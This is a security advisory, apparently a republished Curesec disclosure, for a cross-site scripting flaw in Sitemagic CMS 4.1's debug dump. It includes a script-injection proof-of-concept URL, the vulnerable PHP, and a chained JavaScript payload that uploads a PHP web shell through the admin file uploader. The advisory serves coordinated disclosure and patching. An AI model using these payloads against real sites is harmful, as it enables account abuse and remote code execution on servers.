Sitemagic CMS 4.1 Cross Site Scripting

2015.11.17
Credit: Curesec
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Security Advisory - Curesec Research Team 1. Introduction Affected Sitemagic CMS 4.1 Product: Fixed in: 4.1.1 Fixed Version http://sitemagic.org/index.php?SMExt=SMDownloads& Link: SMDownloadsFile=SitemagicCMS411.zip Vendor Contact: dev@sitemagic.org Vulnerability XSS Type: Remote Yes Exploitable: Reported to 09/29/2015 vendor: Disclosed to 11/13/2015 public: Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description If debug is enabled - which it is by default - the values of POST and GET are echoed unencoded, leading to an XSS vulnerability. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in this case may lead to code execution. 3. Proof of Concept http://localhost/Sitemagic/?dump=true&foo='"></script><script>alert(1)</script> 4. Code index.php if ($debug === true) { $end = microtime(true); if (isset($_REQUEST["dump"]) === true) { $time = $end - $start; echo "<br>Memory usage: " . memory_get_usage(true) / 1024 . " KB"; echo "<br>Time usage: " . $time . " seconds"; echo " <br><h3>POST</h3> <pre>" . print_r($_POST, true) . "</pre> <br><h3>GET</h3> <pre>" . print_r($_GET, true) . "</pre> "; } } 5. XSS to Code Execution Because the file upload in the admin area does not restrict the file type, an attacker can gain code execution via the XSS vulnerability. http://localhost/Sitemagic/?dump=true&foo="><script src="http://localhost/s.js"></script> /s.js: submitRequest(); function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/Sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages%2Fdemo", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------72100436920187879541838388265"); xhr.withCredentials = true; var body = "-----------------------------72100436920187879541838388265\r\n" + "Content-Disposition: form-data; name=\"SMInputSMFilesUpload\"; filename=\"shell.php\"\r\n" + "Content-Type: application/x-php\r\n" + "\r\n" + "\x3c?php passthru($_GET[\'x\']); ?\x3e\n" + "\r\n" + "-----------------------------72100436920187879541838388265\r\n" + "Content-Disposition: form-data; name=\"SMPostBackControl\"\r\n" + "\r\n" + "\r\n" + "-----------------------------72100436920187879541838388265--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } 6. Solution To mitigate this issue please upgrade at least to version 4.1.1: http://sitemagic.org/index.php?SMExt=SMDownloads&SMDownloadsFile= SitemagicCMS411.zip Please note that a newer version might already be available. 7. Report Timeline 09/29/2015 Informed Vendor about Issue 09/29/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Sitemagic-CMS-41-XSS-91.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top